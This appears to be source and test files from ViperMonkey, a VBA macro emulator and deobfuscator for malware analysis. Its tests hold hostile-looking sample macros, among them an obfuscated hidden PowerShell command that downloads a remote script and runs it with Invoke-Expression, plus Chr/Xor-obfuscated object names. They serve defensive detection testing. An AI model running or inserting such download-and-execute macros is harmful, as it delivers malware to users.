m3 = "!!!" 23 | m1 & m2 & m3 24 | ''') 25 | assert vipermonkey.eval(vba_code) == 'hello world!!!' 26 | 27 | 28 | def test_eval_with_context(): 29 | vba_code = dedent(''' 30 | Dim m1, m2, m3, result As String 31 | m1 = "he" & "ll" & Chr(111) & " " 32 | m2 = "w" & Chr(111) & "rl" & Chr(123 Xor 31) 33 | m3 = "!!!" 
34 | result = m1 & m2 & m3 35 | ''') 36 | context = vipermonkey.Context() 37 | vipermonkey.eval(vba_code, context=context) 38 | assert context.locals == {'m1': 'hello ', 'result': 'hello world!!!', 'm3': '!!!', 'm2': 'world'} 39 | assert context['result'] == 'hello world!!!' 40 | 41 | 42 | def test_module(): 43 | """Tests Module interaction.""" 44 | # Test iterating functions. 45 | vba_code = dedent(''' 46 | Attribute VB_Name = "ThisDocument" 47 | Attribute VB_Base = "1Normal.ThisDocument" 48 | 49 | Sub Document_Open() 50 | On Error Resume Next 51 | Dim message As String 52 | message = PrintHello("Jamie") 53 | MsgBox message 54 | End Sub 55 | 56 | Function PrintHello(person As String) As String 57 | Dim m1 As String 58 | m1 = "he" & "ll" & Chr(111) & " " 59 | PrintHello = m1 & person 60 | End Function 61 | ''') 62 | module = vipermonkey.Module(vba_code) 63 | assert sorted(proc.name for proc in module.procedures) == ['Document_Open', 'PrintHello'] 64 | 65 | # Test iterating code_blocks. 66 | expected_code_blocks = [ 67 | (Attribute_Statement, 'Attribute VB_Name = "ThisDocument"\n'), 68 | (Attribute_Statement, 'Attribute VB_Base = "1Normal.ThisDocument"\n'), 69 | (Sub, dedent('''\ 70 | Sub Document_Open() 71 | On Error Resume Next 72 | Dim message As String 73 | message = PrintHello("Jamie") 74 | MsgBox message 75 | End Sub 76 | ''')), 77 | (Function, dedent('''\ 78 | Function PrintHello(person As String) As String 79 | Dim m1 As String 80 | m1 = "he" & "ll" & Chr(111) & " " 81 | PrintHello = m1 & person 82 | End Function 83 | ''')) 84 | ] 85 | for (expected_type, expected_code), code_block in zip(expected_code_blocks, module.code_blocks): 86 | assert code_block.type == expected_type 87 | assert str(code_block) == expected_code 88 | 89 | # Test evaluating directly with code_blocks 90 | for code_block in module.code_blocks: 91 | if code_block.type == vipermonkey.Function and code_block.name == 'PrintHello': 92 | assert code_block.eval(params=['Bob']) == 'hello Bob' 93 
| break 94 | else: 95 | pytest.fail('Failed to find PrintHello() function.') 96 | 97 | # Test evaluating using a prefilled context. 98 | context = vipermonkey.Context() 99 | module.load_context(context) 100 | assert vipermonkey.eval('PrintHello("Bob")', context=context) == 'hello Bob' 101 | 102 | 103 | def test_file_extraction(): 104 | vba_code = dedent(r''' 105 | Sub WriteFile(data As String) 106 | Dim a, b, c As String 107 | a = "Scr" 108 | b = "ipting" & Chr(46) & "FileSy" 109 | c = "st" & Chr(69) & "mObject" 110 | Dim fso As Object 111 | Set fso = CreateObject(a & b & c) 112 | Dim Fileout As Object 113 | Dim url As String 114 | url = "c:\users\public\" & "documents\hello.txt" 115 | Set Fileout = fso.CreateTextFile(url, True, True) 116 | Fileout.Write data 117 | Fileout.Close 118 | End Sub 119 | 120 | WriteFile("This " & "is some" & " file data!") 121 | ''') 122 | context = vipermonkey.Context() 123 | vipermonkey.eval(vba_code, context=context) 124 | assert context.open_files == {} 125 | assert context.closed_files == {'c:\\users\\public\\documents\\hello.txt': 'This is some file data!'} 126 | 127 | 128 | def test_function_replacement(): 129 | vba_code = dedent(r''' 130 | Public Function Base64Decode(ByVal s As String) As Byte() 131 | ' Some complex code 132 | End Function 133 | 134 | Public Sub Document_Open() 135 | Dim result As String 136 | result = Base64Decode("aGVsbG8gd29ybGQh") 137 | End Sub 138 | ''') 139 | 140 | def replaced_base64(context, params): 141 | # NOTE: We can update the context here if the function has side effects. 142 | return base64.b64decode(params[0]) 143 | 144 | context = vipermonkey.Context() 145 | module = vipermonkey.Module(vba_code) 146 | # NOTE: The function must be replaced after the module has been evaluated into the context. Otherwise, the module's own definition will overwrite our replacement.
147 | module.eval(context) 148 | 149 | context.globals['Base64Decode'] = replaced_base64 150 | 151 | document_open = context['Document_Open'] 152 | document_open.load_context(context) 153 | assert 'result' in context 154 | assert context['result'] == 'hello world!' 155 | 156 | 157 | def test_reporting_actions(): 158 | vba_code = dedent(r''' 159 | Public Function Execute() As Variant 160 | 161 | Dim m1, m2, m3, m4 As String 162 | 163 | m1 = "p" & "o" & "w" & "e" & "r" & "s" & "h" & "e" & "l" & "l" & " " & "-" & "w" & " " & "h" & "i" & "d" & "d" & "e" 164 | m2 = "n" & " -" & "e" & "x" & "e" & "c" & " b" & "y" & "p" & "a" & "s" & "s " & "-" & "c " & Chr(34) 165 | m3 = "$a" & "=" & "Invoke" & "-" & "We" & "bRequest" & " ww" & "w.example.com" & "/" & "scr" & "ipt.txt" 166 | m4 = "; " & "Inv" & "ok" & "e-Expr" & "ession " & "$" & "a" & Chr(34) & "" 167 | 168 | Shell m1 & m2 & m3 & m4, vbHide 169 | 170 | WinExec "wscript powershell.exe -x run.ps1", 0 171 | 172 | End Function 173 | 174 | Execute 175 | ''') 176 | 177 | context = vipermonkey.Context() 178 | vipermonkey.eval(vba_code, context=context) 179 | 180 | print dict(context.actions) 181 | 182 | assert dict(context.actions) == { 183 | 'Shell function': [ 184 | ('Execute Command', 'powershell -w hidden -exec bypass -c ' 185 | '"$a=Invoke-WebRequest www.example.com/script.txt; Invoke-Expression $a"')], 186 | 'Interesting Function Call': [('WinExec', ['wscript powershell.exe -x run.ps1', 0])], 187 | 'Interesting Command Execution': [('Run', 'wscript powershell.exe -x run.ps1')], 188 | } 189 | 190 | 191 | 192 | -------------------------------------------------------------------------------- /tests/test_bugs.py: -------------------------------------------------------------------------------- 1 | """Tests our bug fixes and tweaks to ensure future development doesn't mess anything up.""" 2 | 3 | import pytest 4 | 5 | from vipermonkey.core import * 6 | import vipermonkey.core.literals 7 | 8 | 9 | def 
test_call_vs_member_access(): 10 | """ 11 | A "Call_Statement" should take priority over a "MemberAccessExpression". 12 | """ 13 | parsed = member_access_expression.parseString('Fileout.Close')[0] 14 | assert type(parsed) == MemberAccessExpression 15 | assert parsed.lhs == 'Fileout' 16 | assert parsed.rhs == ['Close'] 17 | 18 | parsed = simple_statement.parseString('Fileout.Close')[0] 19 | assert type(parsed) == Call_Statement 20 | assert type(parsed.name) == MemberAccessExpression 21 | assert str(parsed.name) == 'Fileout.Close' 22 | assert len(parsed.params) == 0 23 | 24 | parsed = simple_statement.parseString('Fileout.Write final')[0] 25 | assert type(parsed) == Call_Statement 26 | assert type(parsed.name) == MemberAccessExpression 27 | assert str(parsed.name) == "Fileout.Write('final')" 28 | assert len(parsed.name.rhs) == 1 29 | assert type(parsed.name.rhs[0]) == Function_Call 30 | assert str(parsed.name.rhs[0]) == "Write('final')" 31 | assert len(parsed.name.rhs[0].params) == 1 32 | assert type(parsed.name.rhs[0].params[0]) == SimpleNameExpression 33 | assert str(parsed.name.rhs[0].params[0]) == 'final' 34 | 35 | parsed = simple_statement.parseString('doc.VBProject.VBComponents("ThisDocument").CodeModule.AddFromString "test"')[0] 36 | assert type(parsed) == Call_Statement 37 | assert type(parsed.name) == MemberAccessExpression 38 | assert str(parsed.name) == "doc.VBProject.VBComponents('ThisDocument').CodeModule.AddFromString('test')" 39 | assert parsed.name.lhs == 'doc' 40 | assert map(str, parsed.name.rhs) == ['VBProject', "VBComponents('ThisDocument')", 'CodeModule', "AddFromString('test')"] 41 | assert type(parsed.name.rhs[1]) == Function_Call 42 | assert parsed.name.rhs[1].name == 'VBComponents' 43 | # Params is a pyparsing.ParseResults object, so use list() to convert it to a list.
44 | vb_comp_params = list(parsed.name.rhs[1].params) 45 | assert len(vb_comp_params) == 1 46 | assert type(vb_comp_params[0]) == vipermonkey.core.literals.String 47 | assert str(vb_comp_params[0]) == 'ThisDocument' 48 | add_string_params = list(parsed.name.rhs[-1].params) 49 | assert len(add_string_params) == 1 50 | assert type(add_string_params[0]) == vipermonkey.core.literals.String 51 | assert str(add_string_params[0]) == 'test' 52 | 53 | parsed = simple_statement.parseString(r'fso.CreateTextFile("h" & "e" & "l" & "l" & "o", True, True)')[0] 54 | assert type(parsed) == Call_Statement 55 | assert type(parsed.name) == MemberAccessExpression 56 | assert str(parsed.name) == "fso.CreateTextFile('(h & e & l & l & o), True, True')" 57 | assert parsed.name.rhs[0].params[0].eval(Context()) == 'hello' 58 | 59 | # Preliminary tests to prevent recursive loop. 60 | parsed = expression.parseString('fso.CreateTextFile()')[0] 61 | assert type(parsed) == MemberAccessExpression 62 | assert parsed.lhs == 'fso' 63 | assert type(parsed.rhs[0]) == Function_Call 64 | 65 | # FIXME: I had to disable the Exponential operator in expression and the prop_assign_statement in simple_statement 66 | # to fix a recursion error that was happening with the following line. 
67 | # Ensure this doesn't mess up MemberAccessExpression being used in other places 68 | try: 69 | parsed = simple_statement.parseString(r'Set Fileout2 = fso.CreateTextFile("h" & "e" & "l" & "l" & "o", True, True)')[0] 70 | except RuntimeError as e: 71 | pytest.fail(str(e)) 72 | assert type(parsed) == Let_Statement 73 | assert parsed.name == 'Fileout2' 74 | assert type(parsed.expression) == MemberAccessExpression 75 | assert str(parsed.expression) == "fso.CreateTextFile('(h & e & l & l & o), True, True')" 76 | assert parsed.expression.lhs == 'fso' 77 | assert len(parsed.expression.rhs) == 1 78 | assert type(parsed.expression.rhs[0]) == Function_Call 79 | assert parsed.expression.rhs[0].name == 'CreateTextFile' 80 | assert parsed.expression.rhs[0].params[0].eval(Context()) == 'hello' 81 | 82 | 83 | def test_recursion_errors(): 84 | """Tests that we have fixed the recursion errors.""" 85 | # NOTE: Catching these exceptions helps speed up failures if they are going to occur. 86 | 87 | try: 88 | simple_statement.parseString(r'Set Fileout2 = fso.CreateTextFile("h" & "e" & "l" & "l" & "o", True, True)') 89 | except RuntimeError as e: 90 | pytest.fail(str(e)) 91 | 92 | try: 93 | parsed = expr_list.parseString('a, b, c, d, e, f') 94 | except RuntimeError as e: 95 | pytest.fail(str(e)) 96 | assert len(parsed) == 6 97 | assert str(parsed) == '[a, b, c, d, e, f]' 98 | 99 | try: 100 | simple_statement.parseString(r'Set Fileout = fso.CreateTextFile(url, True, True)') 101 | except RuntimeError as e: 102 | pytest.fail(str(e)) 103 | 104 | -------------------------------------------------------------------------------- /tests/test_deobfuscation.py: -------------------------------------------------------------------------------- 1 | """Tests deobfuscation utility.""" 2 | 3 | from __future__ import print_function 4 | 5 | from textwrap import dedent 6 | 7 | from vipermonkey.core import deobfuscation 8 | 9 | 10 | def test_regex(): 11 | """Tests the regular expressions used.""" 12
| # Chr/String concatenation run. 13 | match = deobfuscation.CONCAT_RUN.match('Chr(71 Xor 18) & "2" & Chr(82 Xor 4) + "0" & Chr(70 Xor 15) & Chr(84 Xor 19) & "9"') 14 | print(match.capturesdict()) 15 | assert match.captures('entry') == [ 16 | 'Chr(71 Xor 18)', '"2"', 'Chr(82 Xor 4)', '"0"', 'Chr(70 Xor 15)', 'Chr(84 Xor 19)', '"9"'] 17 | 18 | # Setting variable run. 19 | match = deobfuscation.VAR_RUN.match(dedent('''\ 20 | ZOOP = Chr(123 Xor 11) 21 | ZOOP = ZOOP & Chr(122 Xor 14) 22 | ZOOP = ZOOP & Chr(109 Xor 4) 23 | ZOOP = ZOOP & Chr(99 Xor 13) 24 | ZOOP = ZOOP & Chr(97 Xor 6) 25 | ZOOP = ZOOP & Chr(34 Xor 12) 26 | ZOOP = ZOOP & Chr(67 Xor 5) 27 | ZOOP = ZOOP & Chr(109 Xor 4) 28 | ZOOP = ZOOP & Chr(109 Xor 1) + Chr(69) + Chr(81 Xor 2) 29 | ZOOP = ZOOP & Chr(107 Xor 18) 30 | ''')) 31 | print(match.capturesdict()) 32 | assert match.group('var') == 'ZOOP' 33 | assert match.captures('entry') == [ 34 | 'Chr(123 Xor 11)', 'Chr(122 Xor 14)', 'Chr(109 Xor 4)', 'Chr(99 Xor 13)', 'Chr(97 Xor 6)', 35 | 'Chr(34 Xor 12)', 'Chr(67 Xor 5)', 'Chr(109 Xor 4)', 'Chr(109 Xor 1) + Chr(69) + Chr(81 Xor 2)', 36 | 'Chr(107 Xor 18)'] 37 | 38 | match = deobfuscation.VAR_RUN.match(dedent('''\ 39 | ZAP = "" 40 | ZAP = ZAP & Chr(80 Xor 19) 41 | ZAP = ZAP & ":" 42 | ZAP = ZAP & "\\" 43 | ZAP = ZAP & Chr(71 Xor 18) 44 | ''')) 45 | print(match.capturesdict()) 46 | assert match.group('var') == 'ZAP' 47 | assert match.captures('entry') == ['""', 'Chr(80 Xor 19)', '":"', '"\\"', 'Chr(71 Xor 18)'] 48 | 49 | 50 | def test_replace_concat_run(): 51 | vba_code = dedent('''\ 52 | ZOOP = Chr(123 Xor 11) & Chr(122 Xor 14) & Chr(109 Xor 4) & Chr(99 Xor 13) 53 | ZOOP = ZOOP & Chr(97 Xor 6) & Chr(34 Xor 12) & Chr(67 Xor 5) & Chr(109 Xor 4) 54 | ZOOP = ZOOP & Chr(109 Xor 1) + Chr(69) + Chr(81 Xor 2) 55 | ZOOP = ZOOP & Chr(107 Xor 18) 56 | ''') 57 | assert deobfuscation._replace_concat_runs(vba_code) == dedent('''\ 58 | ZOOP = "ptin" 59 | ZOOP = ZOOP & "g.Fi" 60 | ZOOP = ZOOP & "lES" 61 | ZOOP = ZOOP & "y" 62
| ''') 63 | 64 | 65 | def test_replace_var_run(): 66 | vba_code = dedent('''\ 67 | ZOOP = Chr(123 Xor 11) 68 | ZOOP = ZOOP & Chr(122 Xor 14) 69 | ZOOP = ZOOP & Chr(109 Xor 4) 70 | ZOOP = ZOOP & Chr(99 Xor 13) 71 | ZOOP = ZOOP & Chr(97 Xor 6) 72 | ZOOP = ZOOP & Chr(34 Xor 12) 73 | ZOOP = ZOOP & Chr(67 Xor 5) 74 | ZOOP = ZOOP & Chr(109 Xor 4) 75 | ZOOP = ZOOP & Chr(109 Xor 1) + Chr(69) + Chr(81 Xor 2) 76 | ZOOP = ZOOP & Chr(107 Xor 18) 77 | ''') 78 | print(repr(deobfuscation._replace_var_runs(vba_code))) 79 | assert deobfuscation._replace_var_runs(vba_code) == ( 80 | 'ZOOP = Chr(123 Xor 11) & Chr(122 Xor 14) & Chr(109 Xor 4) & ' 81 | 'Chr(99 Xor 13) & Chr(97 Xor 6) & Chr(34 Xor 12) & Chr(67 Xor 5) & Chr(109 Xor 4) ' 82 | '& Chr(109 Xor 1) + Chr(69) + Chr(81 Xor 2) & Chr(107 Xor 18)\n') 83 | 84 | 85 | def test_deobfuscation(): 86 | vba_code = dedent('''\ 87 | ZOOP = Chr(123 Xor 11) 88 | ZOOP = ZOOP & Chr(122 Xor 14) 89 | ZOOP = ZOOP & Chr(109 Xor 4) 90 | ZOOP = ZOOP & Chr(99 Xor 13) 91 | ZOOP = ZOOP & Chr(97 Xor 6) & Chr(34 Xor 12) & Chr(67 Xor 5) & Chr(109 Xor 4) 92 | ZOOP = ZOOP & Chr(109 Xor 1) + Chr(69) + Chr(81 Xor 2) 93 | ZOOP = ZOOP & Chr(107 Xor 18) 94 | ''') 95 | assert deobfuscation.deobfuscate(vba_code) == dedent('''\ 96 | ZOOP = "pting.FilESy" 97 | ''') 98 | 99 | vba_code = dedent('''\ 100 | ZAP = "" 101 | ZAP = ZAP & Chr(80 Xor 19) 102 | ZAP = ZAP & ":" 103 | ZAP = ZAP & "\\" 104 | ZAP = ZAP & Chr(71 Xor 18) 105 | ''') 106 | assert deobfuscation.deobfuscate(vba_code) == dedent('''\ 107 | ZAP = "C:\\U" 108 | ''') -------------------------------------------------------------------------------- /tests/test_expressions.py: -------------------------------------------------------------------------------- 1 | """ 2 | Tests the grammars and logic in expressions.py 3 | """ 4 | 5 | from textwrap import dedent 6 | 7 | import vipermonkey 8 | from vipermonkey.core import * 9 | import vipermonkey.core.literals 10 | 11 | 12 | def test_paragraphs(): 13 | """Tests
references to the .Paragraphs field of the current doc.""" 14 | context = vipermonkey.Context() 15 | context['ActiveDocument.Paragraphs'] = 'PARAGRAPH OBJECT' 16 | 17 | assert vipermonkey.eval('ActiveDocument.Paragraphs', context) == 'PARAGRAPH OBJECT' 18 | 19 | parsed = simple_statement.parseString('ActiveDocument.Paragraphs')[0] 20 | assert type(parsed) == Call_Statement 21 | assert type(parsed.name) == MemberAccessExpression 22 | assert parsed.eval(context) == 'PARAGRAPH OBJECT' 23 | 24 | # Having "ActiveDocument" is not required. 25 | parsed = simple_statement.parseString('something_else.Paragraphs')[0] 26 | assert type(parsed) == Call_Statement 27 | assert type(parsed.name) == MemberAccessExpression 28 | assert parsed.eval(context) == 'PARAGRAPH OBJECT' 29 | 30 | # Doesn't work if not last entry. 31 | parsed = simple_statement.parseString('ActiveDocument.Paragraphs.Count')[0] 32 | assert type(parsed) == Call_Statement 33 | assert type(parsed.name) == MemberAccessExpression 34 | assert parsed.name.eval(context) == 'ActiveDocument.Paragraphs.Count' 35 | 36 | parsed = simple_statement.parseString('r = ActiveDocument.Paragraphs')[0] 37 | assert type(parsed) == Let_Statement 38 | assert type(parsed.expression) == MemberAccessExpression 39 | assert parsed.expression.eval(context) == 'PARAGRAPH OBJECT' 40 | 41 | 42 | def test_oslanguage(): 43 | """Tests references to the OSlanguage field.""" 44 | context = vipermonkey.Context() 45 | context['oslanguage'] = 'Spanish' 46 | assert vipermonkey.eval('OS.OSLanguage', context) == 'Spanish' 47 | 48 | 49 | def test_application_run(): 50 | """Tests functions called with Application.Run()""" 51 | context = vipermonkey.Context() 52 | vipermonkey.eval('Application.Run(WinExec, "powershell.exe test.ps1")', context) 53 | 54 | assert context.actions == { 55 | # FIXME: Application.Run from VBALibraryFuncs doesn't get called for some reason. 
56 | # 'Interesting Function Call': [('Run', 'WinExec')], 57 | 'Interesting Command Execution': [('Run', 'powershell.exe test.ps1')] 58 | } 59 | 60 | 61 | def test_clipboard(): 62 | """Tests calls to setData() and getData() clipboard.""" 63 | context = vipermonkey.Context() 64 | 65 | assert '** CLIPBOARD **' not in context 66 | assert vipermonkey.eval('objHTML.ParentWindow.clipboardData.getData()', context) is None 67 | assert vipermonkey.eval('objHTML.ParentWindow.clipboardData.setData(None, "test data")', context) is True 68 | assert '** CLIPBOARD **' in context.globals 69 | assert context['** CLIPBOARD **'] == 'test data' 70 | assert vipermonkey.eval('objHTML.ParentWindow.clipboardData.getData()', context) == 'test data' 71 | 72 | 73 | def test_doc_vars(): 74 | """Tests calls to retrieve document properties.""" 75 | context = vipermonkey.Context() 76 | context.doc_vars['subject'] = 'test Subject' 77 | 78 | assert vipermonkey.eval('ActiveDocument.BuiltInDocumentProperties("Subject")', context) == 'test Subject' 79 | assert vipermonkey.eval('ActiveDocument.variables("subject")', context) == 'test Subject' 80 | 81 | # TODO: Add test for _handle_docvar_value() 82 | 83 | 84 | def test_text_file_read(tmpdir): 85 | """Tests OpenTextFile(...).ReadAll() calls.""" 86 | test_file = tmpdir / 'test.txt' 87 | test_file.write('this is test data') 88 | 89 | assert vipermonkey.eval('fs.OpenTextFile("{!s}").ReadAll()'.format(test_file)) == 'this is test data' 90 | 91 | # It should also work when the drive is uppercase. 
92 | # (see note in _handle_text_file_read()) 93 | test_file = str(test_file) 94 | if test_file.startswith('c:'): 95 | test_file = 'C:' + test_file[2:] 96 | assert vipermonkey.eval('fs.OpenTextFile("{!s}").ReadAll()'.format(test_file)) == 'this is test data' 97 | 98 | 99 | def test_file_close(): 100 | """Tests close of file object foo.Close()""" 101 | context = vipermonkey.Context() 102 | context.open_file('test.txt') 103 | context.write_file('test.txt', b'data') 104 | 105 | assert not context.closed_files 106 | # vipermonkey closes the last open file 107 | vipermonkey.eval('foo.Close()', context) 108 | assert context.closed_files == {'test.txt': b'data'} 109 | 110 | 111 | def test_replace(): 112 | """Tests string replaces of the form foo.Replace(bar, baz)""" 113 | 114 | assert vipermonkey.eval('foo.Replace("replace foo with bar", "foo", "bar")') == 'replace bar with bar' 115 | 116 | # TODO: Add test for RegExp object. 117 | # context = vipermonkey.Context() 118 | # context['RegExp.Pattern'] = '[a-z]*!' 119 | # 120 | # assert vipermonkey.eval('RegExp.Replace("hello world!", "mars!")') == 'hello mars!' 121 | 122 | 123 | def test_add(): 124 | """Tests Add() function""" 125 | context = vipermonkey.Context() 126 | context['my_dict'] = {'a': 1, 'b': 2} 127 | 128 | vipermonkey.eval('my_dict.Add("c", 3)', context) 129 | assert context['my_dict'] == {'a': 1, 'b': 2, 'c': 3} 130 | 131 | 132 | def test_adodb_writes(): 133 | """Tests expression like "foo.Write(...)" where foo = "ADODB.Stream" """ 134 | context = vipermonkey.Context() 135 | vipermonkey.eval('CreateObject("ADODB.Stream").Write("this is test data")', context) 136 | assert context.open_files == {'ADODB.Stream': 'this is test data'} 137 | 138 | # FIXME: This method fails. 
139 | # context = vipermonkey.Context() 140 | # vipermonkey.eval(dedent(r''' 141 | # foo = CreateObject("ADODB.Stream") 142 | # foo.Write("this is test data") 143 | # '''), context) 144 | # assert context.open_files == {'ADODB.Stream': 'this is test data'} 145 | 146 | 147 | def test_loadxml(): 148 | # TODO 149 | pass 150 | -------------------------------------------------------------------------------- /vipermonkey/.prospector.yaml: -------------------------------------------------------------------------------- 1 | strictness: medium 2 | test-warnings: true 3 | doc-warnings: false 4 | 5 | pep8: 6 | disable: 7 | - W602 8 | - W605 9 | - W603 10 | - E129 11 | enable: 12 | - W601 13 | options: 14 | max-line-length: 140 15 | 16 | pylint: 17 | disable: 18 | - wrong-import-position 19 | - logging-not-lazy 20 | - len-as-condition 21 | options: 22 | max-nested-blocks: 7 23 | max-branches: 60 24 | max-locals: 30 25 | max-statements: 150 26 | max-args: 10 27 | 28 | mccabe: 29 | run: true 30 | options: 31 | max-complexity: 60 32 | 33 | vulture: 34 | run: false 35 | -------------------------------------------------------------------------------- /vipermonkey/__init__.py: -------------------------------------------------------------------------------- 1 | """Exposes interface for ViperMonkey""" 2 | 3 | from vipermonkey.api import * 4 | from vipermonkey.core.deobfuscation import deobfuscate 5 | -------------------------------------------------------------------------------- /vipermonkey/core/.prospector.yaml: -------------------------------------------------------------------------------- 1 | strictness: medium 2 | test-warnings: true 3 | doc-warnings: false 4 | 5 | pep8: 6 | disable: 7 | - W602 8 | - W605 9 | - W603 10 | - E129 11 | enable: 12 | - W601 13 | options: 14 | max-line-length: 140 15 | 16 | pylint: 17 | disable: 18 | - wrong-import-position 19 | - logging-not-lazy 20 | - len-as-condition 21 | options: 22 | max-nested-blocks: 7 23 | max-branches: 60 24 | max-locals: 
30 25 | max-statements: 150 26 | max-args: 10 27 | 28 | mccabe: 29 | run: true 30 | options: 31 | max-complexity: 60 32 | 33 | vulture: 34 | run: false 35 | -------------------------------------------------------------------------------- /vipermonkey/core/antlr_vba/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/decalage2/ViperMonkey/73547cef7f82dbcb10e22e36b84b558a07f7d21d/vipermonkey/core/antlr_vba/__init__.py -------------------------------------------------------------------------------- /vipermonkey/core/antlr_vba/antlr4.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | set classpath0=%CLASSPATH% 3 | SET CLASSPATH=.;C:\Javalib\antlr-4.6-complete.jar;%CLASSPATH% 4 | java org.antlr.v4.Tool %* 5 | set classpath=%classpath0% 6 | set classpath0= -------------------------------------------------------------------------------- /vipermonkey/core/antlr_vba/grun.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | set classpath0=%CLASSPATH% 3 | SET CLASSPATH=.;C:\Javalib\antlr-4.6-complete.jar;%CLASSPATH% 4 | java org.antlr.v4.gui.TestRig %* 5 | set classpath=%classpath0% 6 | set classpath0= 7 | -------------------------------------------------------------------------------- /vipermonkey/core/antlr_vba/makevba.bat: -------------------------------------------------------------------------------- 1 | antlr4 -Dlanguage=Python2 -encoding utf8 vba.g4 -------------------------------------------------------------------------------- /vipermonkey/core/antlr_vba/testvba.py: -------------------------------------------------------------------------------- 1 | import antlr4 2 | import sys 3 | 4 | from vbaLexer import vbaLexer 5 | from vbaListener import vbaListener 6 | from vbaParser import vbaParser 7 | 8 | class MyListener(vbaListener): 9 | def __init__(self): 10 | pass 11 | 12 | def 
enterSubStmt(self, ctx): 13 | for child in ctx.children: 14 | # Skip all children that aren't AmbiguousIdentifier 15 | if isinstance(child, vbaParser.AmbiguousIdentifierContext): 16 | # if type(child).__name__ != 'AmbiguousIdentifierContext': 17 | name = child.getText() 18 | print('Sub %r' % name) 19 | # self.that.globals[name.lower()] = ctx 20 | 21 | def exitSubStmt(self, ctx): 22 | print('exitSubStmt') 23 | 24 | def enterFunctionStmt(self, ctx): 25 | for child in ctx.children: 26 | # Skip all children that aren't AmbiguousIdentifier 27 | if type(child).__name__ != 'AmbiguousIdentifierContext': 28 | continue 29 | name = child.getText() 30 | print('Function %r' % name) 31 | # self.that.globals[name.lower()] = ctx 32 | 33 | def enterBlockStmt(self, ctx): 34 | print('enterBlockStmt:') 35 | print(ctx.getText()) 36 | 37 | def enterLiteral(self, ctx): 38 | print('enterLiteral:') 39 | print(ctx.getText()) 40 | 41 | 42 | try: 43 | filename = sys.argv[1] 44 | except: 45 | sys.exit('Usage: %s ' % sys.argv[0]) 46 | 47 | print('Parsing %s' % filename) 48 | print('Lexer') 49 | lexer = vbaLexer(antlr4.FileStream(sys.argv[1])) 50 | print('Stream') 51 | stream = antlr4.CommonTokenStream(lexer) 52 | print('vbaParser') 53 | parser = vbaParser(stream) 54 | print('Parsing from startRule') 55 | tree = parser.startRule() 56 | print('Walking the parse tree') 57 | listener = MyListener() 58 | walker = antlr4.ParseTreeWalker() 59 | walker.walk(listener, tree) 60 | -------------------------------------------------------------------------------- /vipermonkey/core/comments_eol.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """@package comments_eol 4 | Parsing of VB comments and end of line markers. 
5 | """ 6 | 7 | import logging 8 | from pyparsing import Literal, SkipTo, Combine, Suppress, Optional, CaselessKeyword, OneOrMore 9 | from vba_lines import line_terminator 10 | from logger import log 11 | if (log.getEffectiveLevel() == logging.DEBUG ): 12 | log.debug('importing comments_eol') 13 | 14 | """ 15 | ViperMonkey is a specialized engine to parse, analyze and interpret Microsoft 16 | VBA macros (Visual Basic for Applications), mainly for malware analysis. 17 | 18 | Author: Philippe Lagadec - http://www.decalage.info 19 | License: BSD, see source code or documentation 20 | 21 | Project Repository: 22 | https://github.com/decalage2/ViperMonkey 23 | """ 24 | 25 | # === LICENSE ================================================================== 26 | 27 | # ViperMonkey is copyright (c) 2015-2016 Philippe Lagadec (http://www.decalage.info) 28 | # All rights reserved. 29 | # 30 | # Redistribution and use in source and binary forms, with or without modification, 31 | # are permitted provided that the following conditions are met: 32 | # 33 | # * Redistributions of source code must retain the above copyright notice, this 34 | # list of conditions and the following disclaimer. 35 | # * Redistributions in binary form must reproduce the above copyright notice, 36 | # this list of conditions and the following disclaimer in the documentation 37 | # and/or other materials provided with the distribution. 38 | # 39 | # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 40 | # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 41 | # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 42 | # DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 43 | # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 44 | # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 45 | # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 46 | # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 47 | # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 48 | # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 49 | 50 | 51 | # ------------------------------------------------------------------------------ 52 | # CHANGELOG: 53 | # 2015-02-12 v0.01 PL: - first prototype 54 | # 2015-2016 PL: - many updates 55 | # 2016-06-11 v0.02 PL: - split vipermonkey into several modules 56 | 57 | __version__ = '0.02' 58 | 59 | # ------------------------------------------------------------------------------ 60 | # TODO: 61 | 62 | # --- COMMENT ---------------------------------------------------------------- 63 | 64 | # 3.3.1 Separator and Special Tokens 65 | # single-quote = %x0027 ; ' 66 | # comment-body = *(line-continuation / non-line-termination-character) LINE-END 67 | single_quote = Literal("'") 68 | comment_body = SkipTo(line_terminator) # + line_terminator 69 | # NOTE: the comment body should NOT include the line terminator 70 | 71 | # single quote comment 72 | comment_single_quote = Combine(single_quote + comment_body) 73 | 74 | # 5.4.1.2 Rem Statement 75 | # rem-statement = "Rem" comment-body 76 | rem_statement = Suppress(Combine(CaselessKeyword('Rem') + comment_body)) 77 | 78 | # --- SEPARATOR AND SPECIAL TOKENS --------------------------------------- 79 | 80 | # 3.3.1 Separator and Special Tokens 81 | # WS = 1*(WSC / line-continuation) 82 | # special-token = "," / "." / "!" / "#" / "&" / "(" / ")" / "*" / "+" / "-" / "/" / ":" / ";" 83 | # / "<" / "=" / ">" / "?" 
